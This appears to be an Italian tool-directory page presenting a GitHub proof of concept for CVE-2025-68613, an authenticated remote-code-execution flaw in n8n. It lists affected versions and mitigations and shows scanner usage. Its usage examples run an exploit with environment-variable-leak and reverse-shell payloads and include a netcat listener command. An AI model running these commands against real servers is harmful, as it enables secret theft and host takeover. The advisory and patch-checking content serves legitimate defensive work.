Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Blackash-CVE-2025-68613 — CVE-2025-68613 | Kitploit
Strumenti/GitHubGitHub/sahilccras/blackash-cve-2025-68613
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubsahilccras/blackash-cve-2025-68613

Blackash-CVE-2025-68613

CVE-2025-68613

Vedi Repository
18 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 CVE-2025-68613 — RCE critica in n8n

n8nblog

Gravità: 🔴 Critica Impatto: Esecuzione di codice remoto (Remote Code Execution) Piattaforma interessata: n8n (automazione dei flussi di lavoro)


🧩 Panoramica

CVE-2025-68613 è una vulnerabilità di sicurezza critica in n8n, una piattaforma open-source di automazione dei flussi di lavoro. Il problema consente a un attaccante autenticato di eseguire codice arbitrario sul server abusando del modo in cui vengono valutate le espressioni dei flussi di lavoro.


🎯 Dettagli della vulnerabilità

  • Tipo: Iniezione di espressioni → Esecuzione di codice remoto
  • CWE: CWE-913 — Improper Control of Dynamically-Managed Code Resources
  • Vettore di attacco: Rete
  • Privilegi richiesti: Basso (utente autenticato)
  • Interazione dell'utente: Nessuna
  • Ambito: Modificato

💥 Perché è pericoloso: Le espressioni dannose vengono valutate in un contesto non adeguatamente isolato (sandbox), consentendo l'accesso al runtime sottostante.


🧨 Impatto potenziale

G8vg8GbXkAAJan2

Se sfruttata, un attaccante potrebbe:

  • 🖥️ Eseguire comandi di sistema arbitrari
  • 🔐 Rubare credenziali, token e segreti
  • 🧬 Modificare o aggiungere backdoor ai flussi di lavoro
  • 📤 Esfiltrare dati sensibili
  • 💣 Compromettere completamente l'host n8n

L'attacco viene eseguito con gli stessi privilegi del servizio n8n, amplificandone l'impatto.


📊 Metriche di gravità

MetricaValore
CVSS v3.1~9.9–10.0
RiservatezzaAlta
IntegritàAlta
Disponibilità

➡️ È richiesta l'autenticazione, ma non è necessario alcun accesso amministrativo.


🧪 Versioni interessate

🚫 Vulnerabili:

  • 0.211.0 → 1.120.3
  • 1.121.0

✅ Corrette:

  • 1.120.4
  • 1.121.1
  • 1.122.0 e successive

🛠️ Rimedio e mitigazione

✅ Consigliato (Opzione migliore)

  • Aggiornare immediatamente a una versione corretta

⚠️ Riduzione temporanea del rischio

(Non rimuove completamente la vulnerabilità)

  • Limitare la creazione/modifica dei flussi di lavoro ai soli utenti fidati
  • Eseguire n8n con privilegi minimi del sistema operativo
  • Isolare il servizio (contenitori, VM, filesystem limitato)
  • Limitare l'esposizione di rete (VPN, regole firewall)
  • Abilitare la registrazione e monitorare le modifiche ai flussi di lavoro

🧠 Riferimento rapido



✅ CVE-2025-68613.py — Controllo remoto di versione ed esposizione (sicuro)

🧪 Esempio di utilizzo

root@kitploit:~
sudo python3 CVE-2025-68613.py -u http://127.0.0.1:5678

Output di esempio

root@kitploit:~
[+] Target: http://127.0.0.1:5678
[+] Possible n8n detected at /
[+] Detected version: 1.120.2

--- Result ---
🚨 VULNERABLE
Target version is affected by CVE-2025-68613

Come eseguo questo script?

  1. Scarica e installa Nuclei.
  2. Clona questo repository sul tuo sistema locale.
  3. Esegui il seguente comando:
root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -u http://targets:5678

Oppure, se vuoi analizzare un elenco di host, esegui:

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -l targets.txt

Output di esempio

nuclei

Esempi di utilizzo:

  • Perdita di variabili d'ambiente:
    python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload env_leak

  • Ottieni informazioni utente:
    python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload id

  • Reverse shell (avvia prima il listener: nc -lvnp 4444):
    python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload reverse_shell --attacker_ip YOUR_IP --attacker_port 4444

Questo script è destinato esclusivamente a test di sicurezza autorizzati su sistemi di tua proprietà o per i quali hai ricevuto esplicita autorizzazione al test.


⚠️ ESCLUSIONE DI RESPONSABILITÀ ⚠️

🔒 Questo script è un exploit Proof-of-Concept (PoC) per CVE-2025-68613 in n8n.

📚 È fornito esclusivamente a scopo educativo e solo per test di sicurezza autorizzati.

🛡️ Usalo esclusivamente su sistemi che possiedi, controlli o per cui hai esplicita autorizzazione scritta al test.

🚫 L'uso non autorizzato contro qualsiasi sistema è illegale e potrebbe violare leggi (ad es. leggi su frode informatica e abuso di sistemi informatici).

❌ L'autore e le parti associate non si assumono alcuna responsabilità per usi impropri, danni o conseguenze legali.

✅ Usa responsabilmente, eticamente e nel pieno rispetto di tutte le leggi e normative applicabili.

🔐 Se effettui penetration test, assicurati di avere la dovuta autorizzazione (ad es. Rules of Engagement) in atto.

🛠️ I ricercatori di sicurezza possono usarlo per verificare le vulnerabilità e incoraggiare l'applicazione tempestiva delle patch.


Scarica lo strumento
Alta
CategoriaInformazioni
CVE IDCVE-2025-68613
Prodotton8n
Classe di bugExpression Injection
RisultatoRemote Code Execution
Accesso richiestoUtente autenticato
Correzione disponibileSì